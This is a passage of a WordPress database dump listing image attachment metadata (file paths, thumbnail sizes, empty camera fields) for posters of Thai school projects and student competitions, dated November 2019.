'a:5:{s:5:\"width\";i:898;s:6:\"height\";i:1276;s:4:\"file\";s:133:\"2019/11/โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-psd.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:133:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-psd-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:133:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-psd-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:134:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-psd-768x1091.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1091;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:134:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-psd-721x1024.jpg\";s:5:\"width\";i:721;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:133:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-psd-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15083, 6365, '_wp_attached_file', '2019/11/โครงการแข่งขันการตอบปัญหาวิชาการช่างเชื่อม.jpg'),
(15084, 6365, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:138:\"2019/11/โครงการแข่งขันการตอบปัญหาวิชาการช่างเชื่อม.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:138:\"โครงการแข่งขันการตอบปัญหาวิชาการช่างเชื่อม-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:138:\"โครงการแข่งขันการตอบปัญหาวิชาการช่างเชื่อม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:139:\"โครงการแข่งขันการตอบปัญหาวิชาการช่างเชื่อม-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:139:\"โครงการแข่งขันการตอบปัญหาวิชาการช่างเชื่อม-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:138:\"โครงการแข่งขันการตอบปัญหาวิชาการช่างเชื่อม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15085, 6366, '_wp_attached_file', '2019/11/โครงการแข่งทักษะวิชาชีพการโรงแรม.jpg'),
(15086, 6366, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:108:\"2019/11/โครงการแข่งทักษะวิชาชีพการโรงแรม.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:108:\"โครงการแข่งทักษะวิชาชีพการโรงแรม-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:108:\"โครงการแข่งทักษะวิชาชีพการโรงแรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:109:\"โครงการแข่งทักษะวิชาชีพการโรงแรม-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:109:\"โครงการแข่งทักษะวิชาชีพการโรงแรม-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:108:\"โครงการแข่งทักษะวิชาชีพการโรงแรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15087, 6367, '_wp_attached_file', '2019/11/โครงการกิจกรรมวันสำคัญของชาติpsd.jpg'),
(15088, 6367, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:102:\"2019/11/โครงการกิจกรรมวันสำคัญของชาติpsd.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:102:\"โครงการกิจกรรมวันสำคัญของชาติpsd-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:102:\"โครงการกิจกรรมวันสำคัญของชาติpsd-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:103:\"โครงการกิจกรรมวันสำคัญของชาติpsd-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:103:\"โครงการกิจกรรมวันสำคัญของชาติpsd-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:102:\"โครงการกิจกรรมวันสำคัญของชาติpsd-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15089, 6368, '_wp_attached_file', '2019/11/โครงการคุณธรรม.jpg'),
(15090, 6368, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:54:\"2019/11/โครงการคุณธรรม.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"โครงการคุณธรรม-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:54:\"โครงการคุณธรรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:55:\"โครงการคุณธรรม-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:55:\"โครงการคุณธรรม-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:54:\"โครงการคุณธรรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15091, 6369, '_wp_attached_file', '2019/11/โครงการจรรยาบรรวิชาชีพ.jpg'),
(15092, 6369, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:78:\"2019/11/โครงการจรรยาบรรวิชาชีพ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:78:\"โครงการจรรยาบรรวิชาชีพ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:78:\"โครงการจรรยาบรรวิชาชีพ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:79:\"โครงการจรรยาบรรวิชาชีพ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:79:\"โครงการจรรยาบรรวิชาชีพ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:78:\"โครงการจรรยาบรรวิชาชีพ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15093, 6370, '_wp_attached_file', '2019/11/โครงการประกวดโครการวิชาชีพ.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(15094, 6370, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:90:\"2019/11/โครงการประกวดโครการวิชาชีพ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:90:\"โครงการประกวดโครการวิชาชีพ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:90:\"โครงการประกวดโครการวิชาชีพ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:91:\"โครงการประกวดโครการวิชาชีพ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:91:\"โครงการประกวดโครการวิชาชีพ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:90:\"โครงการประกวดโครการวิชาชีพ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15095, 6371, '_wp_attached_file', '2019/11/โครงการประกวดนักเรียน-นักศึกษาต้นแบบ.jpg'),
(15096, 6371, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:118:\"2019/11/โครงการประกวดนักเรียน-นักศึกษาต้นแบบ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:118:\"โครงการประกวดนักเรียน-นักศึกษาต้นแบบ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:118:\"โครงการประกวดนักเรียน-นักศึกษาต้นแบบ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:119:\"โครงการประกวดนักเรียน-นักศึกษาต้นแบบ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:119:\"โครงการประกวดนักเรียน-นักศึกษาต้นแบบ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:118:\"โครงการประกวดนักเรียน-นักศึกษาต้นแบบ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15097, 6372, '_wp_attached_file', '2019/11/โครงการพัฒนาส่งเสริมภาษาต่างประเทศ.jpg'),
(15098, 6372, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:114:\"2019/11/โครงการพัฒนาส่งเสริมภาษาต่างประเทศ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:114:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:114:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:115:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:115:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:114:\"โครงการพัฒนาส่งเสริมภาษาต่างประเทศ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15099, 6373, '_wp_attached_file', '2019/11/โครงการศสานาและวัฒนธรรม.jpg'),
(15100, 6373, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:81:\"2019/11/โครงการศสานาและวัฒนธรรม.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:81:\"โครงการศสานาและวัฒนธรรม-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:81:\"โครงการศสานาและวัฒนธรรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:82:\"โครงการศสานาและวัฒนธรรม-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:82:\"โครงการศสานาและวัฒนธรรม-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:81:\"โครงการศสานาและวัฒนธรรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15101, 6374, '_wp_attached_file', '2019/11/โครงการศึกษาธรรมชาติ.jpg'),
(15102, 6374, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:72:\"2019/11/โครงการศึกษาธรรมชาติ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"โครงการศึกษาธรรมชาติ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:72:\"โครงการศึกษาธรรมชาติ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:73:\"โครงการศึกษาธรรมชาติ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:73:\"โครงการศึกษาธรรมชาติ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:72:\"โครงการศึกษาธรรมชาติ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15103, 6375, '_wp_attached_file', '2019/11/โครงการส่งเสริมและพัฒนาผลิตภัณฑ์สินค้าชุมชน.jpg'),
(15104, 6375, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:141:\"2019/11/โครงการส่งเสริมและพัฒนาผลิตภัณฑ์สินค้าชุมชน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:141:\"โครงการส่งเสริมและพัฒนาผลิตภัณฑ์สินค้าชุมชน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:141:\"โครงการส่งเสริมและพัฒนาผลิตภัณฑ์สินค้าชุมชน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:142:\"โครงการส่งเสริมและพัฒนาผลิตภัณฑ์สินค้าชุมชน-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:142:\"โครงการส่งเสริมและพัฒนาผลิตภัณฑ์สินค้าชุมชน-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:141:\"โครงการส่งเสริมและพัฒนาผลิตภัณฑ์สินค้าชุมชน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15105, 6376, '_wp_attached_file', '2019/11/โครงการส่งเสริมกิจกรรมอาสาพัฒนา.jpg'),
(15106, 6376, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:724;s:6:\"height\";i:1024;s:4:\"file\";s:105:\"2019/11/โครงการส่งเสริมกิจกรรมอาสาพัฒนา.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:105:\"โครงการส่งเสริมกิจกรรมอาสาพัฒนา-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:105:\"โครงการส่งเสริมกิจกรรมอาสาพัฒนา-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:106:\"โครงการส่งเสริมกิจกรรมอาสาพัฒนา-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:105:\"โครงการส่งเสริมกิจกรรมอาสาพัฒนา-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15107, 6377, '_wp_attached_file', '2019/11/โครงการส่งเสริมทักษะภาษาไทยวันสุนทรภู่.jpg'),
(15108, 6377, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:126:\"2019/11/โครงการส่งเสริมทักษะภาษาไทยวันสุนทรภู่.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:126:\"โครงการส่งเสริมทักษะภาษาไทยวันสุนทรภู่-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:126:\"โครงการส่งเสริมทักษะภาษาไทยวันสุนทรภู่-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:127:\"โครงการส่งเสริมทักษะภาษาไทยวันสุนทรภู่-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:127:\"โครงการส่งเสริมทักษะภาษาไทยวันสุนทรภู่-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:126:\"โครงการส่งเสริมทักษะภาษาไทยวันสุนทรภู่-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15109, 6378, '_wp_attached_file', '2019/11/โครงการส่งเสริมทักษะภาษาอังกฤษ.jpg'),
(15110, 6378, '_wp_attachment_metadata', 